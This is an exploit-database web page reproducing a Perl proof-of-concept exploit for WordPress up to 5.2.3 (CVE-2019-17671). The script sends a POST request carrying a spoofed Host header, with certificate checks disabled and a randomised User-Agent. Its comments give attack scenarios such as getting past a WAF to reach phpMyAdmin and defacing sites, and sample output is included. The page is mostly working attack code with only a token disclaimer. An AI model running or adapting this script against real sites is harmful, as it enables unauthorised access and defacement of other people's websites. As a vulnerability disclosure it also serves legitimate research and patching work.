Advertisement






WordPress 5.2.3 Remote Cross Site Host Modification

CVE Category Price Severity
CVE-2019-17671 CWE-352 Not specified Critical
Author Risk Exploitation Type Date
ExploitAlert Team High Remote 2019-09-08
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/S:U/C:H/I:H/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090049

Below is a copy:

WordPress 5.2.3 Remote Cross Site Host Modification
#!/usr/bin/perl -w
#
#  Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#  Type: Remote
#  Risk: High
#
#  Solution:
#  Set security headers to web server and no-cache for Cache-Control
#  
#  Simple Attack Scenarios:
#  
#     o  This attack can bypass Simple WAF to access restricted content on the web server,
#        something like phpMyAdmin;
#
#     o  This attack can deface the vulnerable Wordpress website with content from the default vhost;
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#       # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
## ====================================================================================
## Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
## >  Host => default-vhost.com
## >  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
## >  Content-Type => application/x-www-form-urlencoded
## <  Connection => close
## <  Date => Fri, 06 Sep 2019 11:39:43 GMT
## <  Location => https://default-vhost.com/
## <  Server => nginx
## <  Content-Type => text/html; charset=UTF-8
## <  Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
## <  Client-Peer => 13.37.13.37:443
## <  Client-Response-Num => 1
## <  Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
## <  Client-SSL-Cert-Subject => /CN=default-vhost.com
## <  Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
## <  Client-SSL-Socket-Class => IO::Socket::SSL
## <  Client-SSL-Warning => Peer certificate not verified
## <  Client-Transfer-Encoding => chunked
## <  Strict-Transport-Security => max-age=31536000;
## <  X-Powered-By => PHP/7.3.9
## <  X-Redirect-By => WordPress
## ====================================================================================
#
#
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'default-vhost.com';


say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
if ($host !~ m/^http/){
say  "# e.g. perl $0 https://target:port/ default-vhost.com";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
say "# ====================================================================================";

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.